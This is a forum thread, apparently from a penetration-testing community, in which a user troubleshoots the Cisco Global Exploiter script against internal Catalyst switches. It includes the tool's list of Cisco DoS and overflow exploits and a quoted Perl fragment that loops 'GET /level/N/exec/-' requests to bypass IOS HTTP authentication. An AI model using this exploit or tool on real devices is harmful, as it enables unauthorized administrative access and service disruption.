Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: cisco global exploiter

  1. #1
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Question cisco global exploiter

    I am testing 4 of our internat cisco catalyst with cisco global exploiter and each time i get: vulnerability successfully exploited with 16
    what does that mean?
    I search google and didn't find any help full information.

  2. #2
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Lightbulb

    Quote Originally Posted by demonize View Post
    I am testing 4 of our internat cisco catalyst with cisco global exploiter and each time i get: vulnerability successfully exploited with 16
    what does that mean?
    I search google and didn't find any help full information.
    Its intranet and what kind of vulnerabilities you got to exploit.Cisco IOS or SNMP Exploits?

  3. #3
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    what kind of vulnerabilities you got to exploit.Cisco IOS or SNMP Exploits?
    Sorry i am not sure of what your asking.
    ./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)

    vulnerability successfully exploited with 16
    WHAT DOES THAN MEANS?????????????????

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    What is the actual command you're typing?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Lightbulb

    Quote Originally Posted by thorin View Post
    What is the actually command you're typing?
    He has mentioned the command already
    ./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)
    for exploiting HTTP authentication on Cisco IOS.

  6. #6
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by secure_it View Post
    He has mentioned the command already
    ./cge.pl -h host -v 3 ( cisco IOS HTTP Auth Vulnerability)
    for exploiting HTTP authentication on Cisco IOS.
    That does not follow the syntax required by the script.
    If that's the command he used then there's no surprise it didn't work unless "host" is actually a valid hostname on his local network which seems doubtful. Additionally the -v switch does not take a string "3 ( cisco IOS HTTP Auth Vulnerability)".
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  7. #7
    Junior Member
    Join Date
    May 2008
    Posts
    35

    Default

    Additionally the -v switch does not take a string "3 ( cisco IOS HTTP Auth Vulnerability)".
    Here is how i typed it in
    ./cge.pl 192.168.1.254 -v 3
    [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability

    [2] - Cisco IOS Router Denial of Service Vulnerability

    [3] - Cisco IOS HTTP Auth Vulnerability

    [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

    [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

    [6] - Cisco 675 Web Administration Denial of Service Vulnerability

    [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

    [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability

    [9] - Cisco 514 UDP Flood Denial of Service Vulnerability

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by demonize View Post
    Here is how i typed it in
    ./cge.pl 192.168.1.254 -v 3
    Ok that's what I was looking for (even if secure_it didn't get it).

    Now looking at the code of the script. If the message you're getting back is:
    Code:
    vulnerability successfully exploited with 16
    Then it's not parsing things correctly or it's not happy with your Cisco device somehow.
    If things were working correctly for the commandline you provided it should return:
    Code:
    Vulnerability successful exploited with [http://192.168.1.254/level/16/exec/....]
    However, if you look at the code you can simply do the test via any browser and see if successful or not.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  9. #9
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Question

    Quote Originally Posted by thorin View Post
    Ok that's what I was looking for (even if secure_it didn't get it).

    Now looking at the code of the script. If the message you're getting back is:
    Code:
    vulnerability successfully exploited with 16
    Then it's not parsing things correctly or it's not happy with your Cisco device somehow.
    If things were working correctly for the commandline you provided it should return:
    Code:
    Vulnerability successful exploited with [http://192.168.1.254/level/16/exec/....]
    However, if you look at the code you can simply do the test via any browser and see if successful or not.
    If I am not wrong.level 16 is pointing to privilege level that is in execution mode.but in My knowledege there is level upto only 15 or administrator level.correct me thorin If I am wrong.http or SDM access is restricted to by default level 15 user only.Is this vulnerability trying to break into using level 15 privilege?

  10. #10
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Yup you're kinda right, but the variable which represents the level in the code is primed to a value of 16 and loops through every value to 99.
    Code:
    sub cisco3 # Cisco IOS HTTP Auth Vulnerability
    {
      my $serv= $host;
      my $n=16;
      my $port=80;
    
      my $target = inet_aton($serv);
      my $fg = 0;
    
      LAB: while ($n<100) {
      my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
      $n++;
      foreach $line (@results){
              $line=~ tr/A-Z/a-z/;
              if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
              if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
      }
    
    ..........
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •